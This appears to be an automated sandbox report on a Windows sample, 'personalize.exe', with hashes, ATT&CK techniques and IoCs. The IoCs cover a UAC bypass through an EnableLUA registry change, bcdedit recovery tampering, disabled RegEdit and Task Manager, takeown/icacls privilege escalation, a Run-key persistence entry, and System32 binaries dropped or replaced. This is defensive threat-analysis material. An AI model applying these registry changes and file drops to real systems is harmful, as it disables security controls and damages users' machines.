8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7

Analysis

max time kernel
94s
max time network
96s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 02:30

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

personalize.exe
Size

832KB
MD5

3780f9b91fde991c40386927dae15096
SHA1

0ac6c6284751dd0bac7d58714f899c16da63256a
SHA256

8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
SHA512

f5fcba684cb2b4d8c6000649140e693d1589e7f42cccbd9592d82d4c3c2c2cb635f3c851bdb2c95aa0bb8ed7872c9b6a55d7dec4734ca2da429b257e41246e2c
SSDEEP

24576:StA4KdTxn+SoA/baP35yfbSLF2aYVlHvAclDJDb:jdTlzV+P35yfsFI3vAclxb

Score

10^/10

defense_evasion discovery evasion exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exe

pid process

304 bcdedit.exe
Disables RegEdit via registry modification 1 IoCs
evasion

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe
Disables Task Manager via registry modification
evasion
Possible privilege escalation attempt 6 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

4188 icacls.exe
4960 takeown.exe
2952 icacls.exe
1136 takeown.exe
652 icacls.exe
5008 takeown.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

356 attrib.exe
424 attrib.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation cmd.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5008 takeown.exe
4188 icacls.exe
4960 takeown.exe
2952 icacls.exe
1136 takeown.exe
652 icacls.exe
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" reg.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
304	bcdedit.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

pid	process
4188	icacls.exe
4960	takeown.exe
2952	icacls.exe
1136	takeown.exe
652	icacls.exe
5008	takeown.exe

pid	process
356	attrib.exe
424	attrib.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
5008	takeown.exe
4188	icacls.exe
4960	takeown.exe
2952	icacls.exe
1136	takeown.exe
652	icacls.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe"	reg.exe

Drops file in System32 directory 14 IoCs

Processes:

cmd.exeattrib.exeattrib.exe

description	ioc	process
File created	C:\Windows\System32\screenmelt.exe	cmd.exe
File opened for modification	C:\Windows\System32\colorcmd.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	attrib.exe
File opened for modification	C:\Windows\System32\taskmgr.exe	cmd.exe
File opened for modification	C:\Windows\System32\msiexec.exe	cmd.exe
File opened for modification	C:\Windows\system32\winnt64.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	cmd.exe
File opened for modification	C:\Windows\System32\screenmelt.exe	cmd.exe
File created	C:\Windows\System32\mbr.exe	cmd.exe
File created	C:\Windows\System32\taskmgr.exe	cmd.exe
File opened for modification	C:\Windows\System32\mmc.exe	cmd.exe
File created	C:\Windows\system32\winnt64.exe	cmd.exe
File created	C:\Windows\System32\colorcmd.exe	cmd.exe
File opened for modification	C:\Windows\System32\winnt64.exe	attrib.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs
ransomware

Defacement
T1491

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png"	reg.exe

Drops file in Windows directory 12 IoCs

Processes:

taskmgr.execmd.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\Web\winntcus64.png	cmd.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File opened for modification	C:\Windows\Web\winntcus64.png	cmd.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

436 timeout.exe
4352 timeout.exe
2856 timeout.exe

pid	process
436	timeout.exe
4352	timeout.exe
2856	timeout.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

browser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 30fd43d75ecbda01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fd63bfe85ecbda01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
